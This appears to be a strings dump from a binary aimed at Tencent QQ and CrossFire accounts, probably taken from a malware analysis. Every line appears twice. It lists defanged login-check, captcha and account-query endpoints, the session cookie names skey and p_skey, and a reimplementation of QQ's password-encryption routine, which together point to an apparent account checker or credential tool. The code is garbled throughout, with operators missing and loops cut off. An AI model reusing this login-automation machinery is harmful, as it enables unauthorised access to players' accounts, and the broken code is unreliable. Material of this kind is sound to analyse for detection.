PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
p_skey=
skey=
skey=
szNick_name=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
tEXtXML:com.adobe.xmp
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
Adobe Photoshop CC (Windows)
Adobe Photoshop CC (Windows)
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿF8>NFFFh
ÿFV
ÿFV
,.Ey)
,.Ey)
qTcp,
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i
for (var i = 0; i
function core_hmac_md5(key, data) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
var bkey = str2binl(key);
if (bkey.length > 16) {
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
return core_md5(opad.concat(hash), 512 128)
return core_md5(opad.concat(hash), 512 128)
for (var i = 0; i
for (var i = 0; i
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
for (var i = 0; i
for (var i = 0; i
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i
for (var i = 0; i
str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i
for (var i = 0; i
if (i * 8 j * 6 > binarray.length * 32) {
if (i * 8 j * 6 > binarray.length * 32) {
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i
for (var i = 0; i
arr.push('\\x' str.substr(i, 2))
arr.push('\\x' str.substr(i, 2))
arr = arr.join('');
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' vcode.length.toString(16);
vcodeLen = '000' vcode.length.toString(16);
while (rsaH1Len.length
while (rsaH1Len.length
TEA.initkey(s2);
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
TEA.initkey('');
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
'/': '-',
' ': '*',
' ': '*',
'=': '_'
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str1 = isMd5 ? password: md5(password);
var str2 = str1 vcode.toUpperCase();
var str2 = str1 vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
$.RSA = function() {
while (z aD
while (z aD
t = aC.substring(z, z aD) '\n';
t = aC.substring(z, z aD) '\n';
return t aC.substring(z, aC.length)
return t aC.substring(z, aC.length)
return '0' t.toString(16)
return '0' t.toString(16)
return t.toString(16)
return t.toString(16)
if (aG
if (aG
var aC = aD.length - 1;
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
z.nextBytes(t)
this.dmp1 = null;
this.dmp1 = null;
this.dmq1 = null;
this.dmq1 = null;
this.coeff = null
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var aD = this.doPublic(t);
var aD = this.doPublic(t);
var z = aD.toString(16);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, 256)
this.fromString(z, t)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = b;
au.prototype.am = az;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DB = ay;
au.prototype.DM = ((1
au.prototype.DM = ((1
au.prototype.DV = (1
au.prototype.DV = (1
au.prototype.FV = Math.pow(2, ac);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
z.fromInt(t);
this.fromRadix(aG, z);
this.fromRadix(aG, z);
var aF = aG.length,
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aG.charAt(aF) == '-') {
if (aE aD > this.DB) {
if (aE aD > this.DB) {
this[this.t - 1] |= (t & ((1
this[this.t - 1] |= (t & ((1
this[this.t ] = (t >> (this.DB - aE))
this[this.t ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
if (aE >= this.DB) {
aE -= this.DB
aE -= this.DB
this[this.t - 1] |= ((1
this[this.t - 1] |= ((1
this.clamp();
this.clamp();
au.ZERO.subTo(this, this)
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
var t = this.s & this.DM;
return '-' this.negate().toString(z)
return '-' this.negate().toString(z)
return this.toRadix(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
var aG = this.DB - (aD * this.DB) % aC;
if (aG > aG) > 0) {
if (aG > aG) > 0) {
aH |= this[--aD] >> (aG = this.DB - aC)
aH |= this[--aD] >> (aG = this.DB - aC)
aG = this.DB; --aD
aG = this.DB; --aD
au.ZERO.subTo(this, t);
au.ZERO.subTo(this, t);
return (this.s
return (this.s
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var z = aH % this.DB;
var t = this.DB - z;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
var aE = Math.floor(aH / this.DB),
aG = (this.s
aG = (this.s
aD.clamp()
aD.clamp()
var aE = Math.floor(aG / this.DB);
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
var z = aG % this.DB;
t = Math.min(z.t, this.t);
t = Math.min(z.t, this.t);
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = this.DV aE
aD[aC ] = this.DV aE
var t = this.abs(),
var t = this.abs(),
aE = z.abs();
aE = z.abs();
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
aD.clamp();
au.ZERO.subTo(aD, aD)
au.ZERO.subTo(aD, aD)
var t = this.abs();
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
aC[z t.t] -= t.DV;
aC[z t.t] -= t.DV;
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
aC.clamp()
var aQ = aK.abs();
var aQ = aK.abs();
var aI = this.abs();
var aI = this.abs();
aH.fromInt(0)
aH.fromInt(0)
this.copyTo(aG)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aQ.copyTo(aE);
aI.copyTo(aG)
aI.copyTo(aG)
var aT = this.FV / aL,
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.clamp();
aG.rShiftTo(aP, aG)
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
this.abs().divRemTo(t, null, z);
if (this.s 0) {
if (this.s 0) {
t.subTo(z, z)
t.subTo(z, z)
if (t.s = 0) {
if (t.s = 0) {
return t.mod(this.m)
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
t.multiplyTo(aC, z);
this.reduce(z)
this.reduce(z)
t.squareTo(z);
t.squareTo(z);
M.prototype.convert = X;
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.mph = this.mp >> 15;
this.um = (1
this.um = (1
this.mt2 = 2 * t.t
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
z.divRemTo(this.m, null, z);
if (t.s 0) {
if (t.s 0) {
this.m.subTo(z, z)
this.m.subTo(z, z)
t.copyTo(z);
t.copyTo(z);
this.reduce(z);
this.reduce(z);
while (t.t
while (t.t
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
while (t[z] >= t.DV) {
t[z] -= t.DV;
t[z] -= t.DV;
t.clamp();
t.clamp();
t.drShiftTo(this.m.t, t);
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
g.prototype.sqrTo = ao;
return au.ONE
return au.ONE
aF = aI.convert(this),
aF = aI.convert(this),
aF.copyTo(aG);
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
return aI.revert(aG)
if (aC
if (aC
return this.exp(aC, aD)
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ZERO = c(0);
au.ONE = c(1);
au.ONE = c(1);
d(new Date().getTime())
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion
if (navigator.appName == 'Netscape' && navigator.appVersion
var H = window.crypto.random(32);
var H = window.crypto.random(32);
for (K = 0; K
for (K = 0; K
W[ae ] = H.charCodeAt(K) & 255
W[ae ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
K = Math.floor(65536 * Math.random());
o.init(W);
o.init(W);
for (ae = 0; ae
for (ae = 0; ae
return o.next()
return o.next()
for (t = 0; t
for (t = 0; t
af.prototype.nextBytes = ax;
af.prototype.nextBytes = ax;
z = (z this.S[aD] aE[aD % aE.length]) & 255;
z = (z this.S[aD] aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.init = f;
m.prototype.next = a;
m.prototype.next = a;
t.setPublic(aC, z);
t.setPublic(aC, z);
return t.encrypt(aD)
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B
for (var B = 0; B
var C = Number(D[B]).toString(16);
var C = Number(D[B]).toString(16);
if (C.length == 1) {
if (C.length == 1) {
for (var A = 0; A
for (var A = 0; A
C = String.fromCharCode(parseInt(B.substr(A, 2), 16))
C = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A
for (var A = 0; A
B[A] = C.charCodeAt(A)
B[A] = C.charCodeAt(A)
var A = C.length;
var A = C.length;
var A = E.length;
var A = E.length;
for (var C = 0; C
for (var C = 0; C
var A = u.length;
var A = u.length;
for (var B = 0; B
for (var B = 0; B
C[B] = E.charCodeAt(B) & 255
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B
for (var B = 0; B
C[A ] = parseInt(E.substr(B, 2), 16)
C[A ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
s.TEA = {
for (var B = 0; B
for (var B = 0; B
A = String.fromCharCode(C[B])
A = String.fromCharCode(C[B])
return d.encode(A)
return d.encode(A)
initkey: function(A, B) {
initkey: function(A, B) {
d.PADCHAR = '=';
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
var A = C.charCodeAt(B);
d.encode = function(E) {
d.encode = function(E) {
if (arguments.length != 1) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var B = d.PADCHAR;
var G = d.ALPHA;
var G = d.ALPHA;
var F = d.getbyte;
var F = d.getbyte;
var C = E.length - E.length % 3;
var C = E.length - E.length % 3;
if (E.length == 0) {
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
A.push(G.charAt(H & 63))
switch (E.length - C) {
switch (E.length - C) {
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);
return A.join('')
return A.join('')
if (!window.btoa) {
if (!window.btoa) {
window.btoa = d.encode
window.btoa = d.encode
var hex = str.toString(16);
var hex = str.toString(16);
var len = hex.length;
var len = hex.length;
arr.push('\\x' hex.substr(j, 2))
arr.push('\\x' hex.substr(j, 2))
var result = arr.join('');
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000' c.length.toString(16);
vcodeLen = '000' c.length.toString(16);
s.TEA.initkey(s2);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);
var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);
s.TEA.initkey('');
s.TEA.initkey('');
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
